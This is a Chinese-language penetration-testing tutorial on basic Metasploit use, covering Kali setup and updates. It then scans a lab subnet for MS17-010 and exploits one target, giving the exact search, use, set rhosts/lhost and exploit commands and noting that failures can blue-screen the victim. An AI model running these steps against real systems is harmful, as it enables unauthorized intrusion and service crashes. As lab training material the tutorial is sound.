第一章信息收集-漏洞利用框架metaspoit基本实用

Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，适合于需要核实漏洞的安全专家，同时也适合于强大进攻能力的渗透测试专家。

Metasploit基本是 远程的最快的那权限的方式。

VMware里的kali虚拟机

配置IP地址

 

在里面只需要敲红框里的内容，配置网卡、IP地址、掩码和网关

 

 ifup eth0开启网卡

centos用yum安装，kali不一样，是apt-get install 软件名

但在安装前要更新apt的源，vim /etc/apt/sources.list,如下图：（这些在网上找文章更新源，比如阿里云）

 

 

msfconsole，简称msf是一款常用的渗透测试工具，包含了常见的漏洞利用模块和生成各种木马，是一款非常好的漏洞框架，有些高危漏洞没扫出来，在这个框架里基本能找到

输入msfconsole回车，运行metasploit，如下图：

红框是漏洞库

 

 

一开始上来可能没有这么多，上边更新源以后，在这下面敲msfupdate，即可对库进行更新

输入以下这个命令（search ms17-010），可以查看ms17-010的payload（有效载荷），有辅助的，也有直接利用的，还有一个扫描的

下图0-1为扫描模块，2-5为漏洞模块，0-2模块可以扫描靶机是否可以被漏洞利用

 

使用的话输入use auxiliary/scanner/smb/smb_ms17_010，想知道怎么用，show options

 

再输入info可以查看说明

 

 

扫描网段的命令 ：set rhosts 网址或网段， exploit用run也可以正常会扫描整个网段，有问题会显示绿颜色

 

这就是有漏洞显示绿色

 

 

现在使用另一个模块

search ms17-010　　（忘了的话就查找下）

 

设置靶机ip

set rhosts 192.168.43.117

设置攻击ip

set lhost 192.168.43.109

开启漏洞攻击

exploit

 

攻击成功则会向下图这样显示，要是中间断开没有攻击成功（win2003会直接蓝屏，07、08还行）的话，被攻击的电脑主机可能会蓝屏

 

成功的话

 

 

下图是一个集中的漏洞库，网站，更新得很快，很多和kali是兼容的，如果有更新可以加载到kali里